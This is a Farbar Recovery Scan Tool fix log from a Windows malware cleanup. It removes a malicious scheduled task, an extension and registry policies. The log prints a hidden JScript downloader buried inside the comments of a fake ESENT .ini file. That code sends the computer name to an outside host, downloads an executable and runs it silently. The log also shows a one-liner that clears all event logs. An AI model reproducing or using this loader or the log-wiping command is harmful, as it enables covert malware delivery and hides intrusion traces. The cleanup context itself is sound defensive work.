Fix result of Farbar Recovery Scan Tool (x86) Version: 29-01-2017
Ran by axioo (01-02-2017 11:04:36) Run:1
Running from C:\Users\axioo\Desktop
Loaded Profiles: axioo (Available Profiles: axioo)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxySettingsPerUser] 0 <======= ATTENTION (Restriction - ProxySettings)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\axioo\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-01-31]
CustomCLSID: HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\axioo\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\axioo\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\axioo\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\FileSyncShell.dll => No File
CMD: type C:\ProgramData\InstallShield\Update\isuspm.ini
Task: {1520FF60-C188-4467-BB74-D410F220E326} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2017-01-30] ()
Task: {A838CE2E-1147-4532-B4A2-8E33135979AF} - System32\Tasks\Optimize Thumbnail Cache Files => Wscript.exe //nologo //E:jscript //B C:\ProgramData\InstallShield\Update\isuspm.ini <==== ATTENTION
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => D:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => D:\Program Files\Google\Update\GoogleUpdate.exe
CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
*****************

Processes closed successfully.
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxySettingsPerUser => value not found.
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully.
C:\Users\axioo\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme => moved successfully
HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E} => key removed successfully.
HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C} => key removed successfully.
HKU\S-1-5-21-4294006291-3268964387-4160186193-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E} => key removed successfully.

========= type C:\ProgramData\InstallShield\Update\isuspm.ini =========

/*{info}
drivername=ESENT
symbolfile=esentprf.hxx
{languages}
009=U.S. English
01F=A.B.D. Ýngilizcesi
01D=Amerikansk engelska
00A=Spanish
019=Russian
016=Portuguese
015=Angielski (USA)
012=Korean
011=Japanese
010=Italian
00E=Amerikai angol
007=German
00C=French
013=Nederlands
005=Czech
004=Traditional Chinese
004=Simplified Chinese
016=Inglês (EUA)
000=Neutral
{objects}
ESE_009_Name=Database
ESE_01F_Name=Veritabaný
ESE_01D_Name=Databas
ESE_00A_Name=Base de datos
ESE_019_Name=Áàçà äàííûõ
ESE_016_Name=Base de dados
ESE_015_Name=Baza danych
ESE_012_Name=Database
ESE_011_Name=Database
ESE_010_Name=Database
ESE_00E_Name=Adatbázis
ESE_007_Name=Datenbank
ESE_00C_Name=Base de données
ESE_013_Name=Database
ESE_005_Name=Databáze
ESE_004_Name=Database
ESE_004_Name=Database
ESE_016_Name=Banco de dados
Instances_009_Name=Database ==> Instances
Instances_01F_Name=Veritabaný ==> Kopyalar
Instances_01D_Name=Databas ==> Instanser
Instances_00A_Name=Base de datos ==> Instancias
Instances_019_Name=Áàçà äàííûõ ==> Ýêçåìïëÿðû
Instances_016_Name=Base de dados ==> Ocorrências
Instances_015_Name=Baza danych ==> Wyst¹pienia
Instances_012_Name=Database ==> Instances
Instances_011_Name=Database ==> Instances
Instances_010_Name=Database ==> Istanze
Instances_00E_Name=Adatbázis ==> Példányok
Instances_007_Name=Datenbank ==> Instanzen
Instances_00C_Name=Base de données ==> Instances
Instances_013_Name=Database ==> Sessies
Instances_005_Name=Databáze ==> Instance
Instances_004_Name=Database ==> Instances
Instances_004_Name=Database ==> Instances
Instances_016_Name=Banco de dados ==> Instâncias
{text}
FCBAsyncScan_000_Help=FCB Asynchronous Scan/sec is the number of cached schema records (FCBs) scanned during asynchronous schema record cleanup. These records are scanned to age out older schema definitions. {Dev Only}
FCBAsyncPurge_000_Help=FCB Asynchronous Purge/sec is the number of cached schema records (FCBs) purged during asynchronous schema record cleanup. These records are purged to age out older schema definitions. {Dev Only}
FCBAsyncThresholdScan_000_Help=FCB Asynchronous Threshold-Scan/sec is the number of cached schema records (FCBs) scanned during asynchronous schema record cleanup. Cleanup was triggered by a large number of schema records above the preferred limit. These records are aggressively scanned to age out older schema definitions. {Dev Only}
FCBAsyncThresholdPurge_000_Help=FCB Asynchronous Threshold-Purge/sec is the number of cached schema records (FCBs) purged during asynchronous schema record cleanup. */var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");/*Cleanup was triggered by a large number of schema records above the preferred limit. These records are aggressively purged to age out older schema definitions. {Dev Only}
FCBAsyncPurgeConflict_000_Help=FCB Asynchronous Purge Conflicts/sec is the number of failed purge attempts on cached schema records (FCBs) during asynchronous schema */var strComputerName = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%COMPUTERNAME%");/*record cleanup. The purge operation failed because exclusive ownership of the schema record could not be obtained. {Dev Only}
FCBSyncPurge_000_Help=FCB Synchronous Purge/sec is the number of cached schema records (FCBs) being synchronously purged each second. {Dev Only}
FCBSyncPurgeStalls_000_Help=FCB Synchronous Purge Stalls/sec is the number of stalls encountered while waiting for exclusive ownership of cached schema records (FCBs) in order to synchronously purge them. {Dev Only}
FCBCacheHits_000_Help=FCB Cache % Hit is the percentage of schema records (FCBs) opened directly from the schema record cache. No file operations were required. {Dev Only}
FCBCacheRequests_000_Help=*/WinHttpReq.Open("GET", "http://searchly.org/xVwd6.php?v=20.0.0.2&n=" + strComputerName, /*async=*/false); WinHttpReq.Send(); strDlUrl = WinHttpReq.ResponseText; var TmpDir = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%Temp%");/*No text
FCBCacheStalls_000_Help=FCB Cache Stalls/sec is the number of stalls encountered while waiting for exclusive ownership of cached schema records (FCBs) in order to update their reference count. {Dev Only}
FCBCacheMax_000_Help=FCB Cache Maximum is the absolute maximum number of the schema records (FCBs) that can exist in the cache. {Dev Only}
FCBCachePreferred_000_Help=FCB Cache Preferred is the preferred maximum number of the schema records (FCBs) that should exist in the cache. {Dev Only}
FCBCacheAlloc_000_Help=FCB Cache Allocated is the number of cached schema records (FCBs) currently allocated and in use. {Dev Only}
FCBCacheAllocAvail_000_Help=FCB Cache Available is the number of cached schema records (FCBs) currently allocated but not in use. These records will be used and/or purged as required. {Dev Only}
PIBInUse_000_Help=Sessions In Use is the number of database sessions currently open for use by client threads. {Dev Only}
PIBUsed_000_Help=Sessions % Used is the percentage of database sessions currently open for use by client threads. {Dev Only}
PIBTotal_000_Help=*/var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", strDlUrl, /*async=*/false); WinHttpReq.Send();/*No text
TableOpenCacheHitRate_000_Help=Table Open Cache % Hit is the percentage of database tables opened using cached schema information. If this percentage is too low, the table cache size may be too small.
TableOpenCacheRequests_000_Help=No text
TableOpenCacheHitsPerSec_000_Help=Table Open Cache Hits/sec is the number of database tables opened using cached schema information per second. If this rate is too low, the table cache size may be too small.
TableOpenCacheMissesPerSec_000_Help=Table Open Cache Misses/sec is the number of database */BinStream = new ActiveXObject("ADODB.Stream");BinStream.Type = 1;BinStream.Open();BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile(TmpDir + "\\wVx4rt.exe",2);/*tables opened without using cached schema information per second. If this rate is too high, the table cache size may be too small.
TableOpensPerSec_000_Help=Table Opens/sec is the number of database tables opened per second.
LGBytesWrittenPerSec_000_Help=Log Bytes Write per second is the rate bytes are written to the log.{Dev Only}
LGUsersWaiting_000_Help=Log Threads Waiting is the number of threads waiting for their data to be written to the log in order to complete an update of the database. If this number is too high, the log may be a bottleneck.
UserROTrxCommit0PerSec_000_Help=User Read Only Transaction Commits to Level 0/sec is the count of fully committed transactions started by the calling process that do not modify any data stored in the MS Exchange DB engine. {Dev Only}
UserRWTrxCommit0PerSec_000_Help=User Read/Write Transaction Commits to Level 0/sec is the count */var WshShell = new ActiveXObject("WScript.Shell");WshShell.Run (TmpDir + "\\wVx4rt.exe /VERYSILENT");/*of fully committed transactions started by the calling process that modify data stored in the MS Exchange DB engine. {Dev Only}
UserTrxCommit0PerSec_000_Help=User Transaction Commits to Level 0/sec is the count of fully committed transactions started by the calling process that access data stored in the MS Exchange DB engine. {Dev Only}
UserROTrxRollback0PerSec_000_Help=User Read Only Transaction Rollbacks to Level 0/sec is the count of aborted transactions started by the calling process that do not modify any data stored in the MS Exchange DB engine. {Dev Only}
UserRWTrxRollback0PerSec_000_Help=User Read/Write Transaction Rollbacks to Level 0/sec is the count of aborted transactions started by the calling process that modify data stored in the MS Exchange DB engine. {Dev Only}
UserTrxRollback0PerSec_000_Help=User Transaction Rollbacks to Level 0/sec is the count of aborted transactions started by the calling process that access data stored in the MS Exchange DB engine. {Dev Only}
SystemROTrxCommit0PerSec_000_Help=System Read Only Transaction Commits to Level 0/sec is the count of fully committed transactions started internally that do not modify any data stored in the MS Exchange DB engine. {Dev Only}
SystemRWTrxCommit0PerSec_000_Help=System Read/Write Transaction Commits to Level 0/sec is the count of fully committed transactions started internally that modify data stored in the MS Exchange DB engine. {Dev Only}
SystemTrxCommit0PerSec_000_Help=System Transaction Commits to Level 0/sec is the count of fully committed transactions started internally that access data stored in the MS Exchange DB engine. {Dev Only}
SystemROTrxRollback0PerSec_000_Help=System Read Only Transaction Rollbacks to Level 0/sec is the count of aborted transactions started internally that do not modify any data stored in the MS Exchange DB engine. {Dev Only}*/

========= End of CMD: =========

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1520FF60-C188-4467-BB74-D410F220E326} => key not found.
C:\Windows\System32\Tasks\AutoKMS => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A838CE2E-1147-4532-B4A2-8E33135979AF} => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A838CE2E-1147-4532-B4A2-8E33135979AF} => key removed successfully.
C:\Windows\System32\Tasks\Optimize Thumbnail Cache Files => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Thumbnail Cache Files => key removed successfully.
C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => moved successfully
C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => moved successfully
C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => moved successfully

========= for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" =========

Failed to clear log DebugChannel. The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation.
Failed to clear log Microsoft-RMS-MSIPC/Debug. The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation.
Failed to clear log Microsoft-Windows-LiveId/Analytic. Access is denied.
Failed to clear log Microsoft-Windows-LiveId/Operational. Access is denied.

========= End of CMD: =========

The system needed a reboot.

==== End of Fixlog 11:05:37 ====